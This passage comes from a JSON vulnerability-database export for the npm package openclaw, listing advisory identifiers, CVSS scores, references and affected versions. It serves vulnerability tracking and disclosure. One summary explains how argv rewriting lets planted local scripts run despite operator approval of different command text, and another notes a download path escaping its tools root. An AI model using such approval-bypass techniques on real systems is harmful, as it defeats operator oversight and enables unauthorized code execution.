ulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"v
ulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"v
ulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-34503","GHSA-2pr2-hcv6-7gwv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gvam-2net-8kc5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90870?format=json","vulnerability_id":"VCID-h3yu-7bfc-vqhz","summary":"Duplicate Advisory: OpenClaw's Node system.run approval hardening wrapper semantic drift can execute unintended local scripts\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-h3rm-6x7g-882f. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw 2026.3.1 contains an approval integrity vulnerability in system.run node-host execution where argv rewriting changes command semantics. 
Attackers can place malicious local scripts in the working directory to execute unintended code despite operator approval of different command text.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/dded569626b0d8e7bdab10b5e7528b6caf73a0f1","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/dded569626b0d8e7bdab10b5e7528b6caf73a0f1"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-integrity-bypass-via-system-run-argv-rewriting","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-integrity-bypass-via-system-run-argv-rewriting"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29608","reference_id":"CVE-2026-29608","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:
X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29608"},{"reference_url":"https://github.com/advisories/GHSA-g87j-gm7p-6vw2","reference_id":"GHSA-g87j-gm7p-6vw2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g87j-gm7p-6vw2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3rm-6x7g-882f","reference_id":"GHSA-h3rm-6x7g-882f","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3rm-6x7g-882f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/978873?format=json","purl":"pkg:npm/openclaw@2026.3.2-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2w
hr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5d
r5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv
92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-ka
u3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9
g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6
tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t6
6z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2-beta.1"}],"aliases":["GHSA-g87j-gm7p-6vw2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h3yu-7bfc-vqhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50896?format=json","vulnerability_id":"VCID-h4av-vgqn-aqcn","summary":"OpenClaw's skills-install-download can be redirected outside the tools root by rebinding the validated base path\nOpenClaw's skills download installer validated the intended per-skill tools root lexically, but later reused that mutable path while downloading and copying the archive into place. 
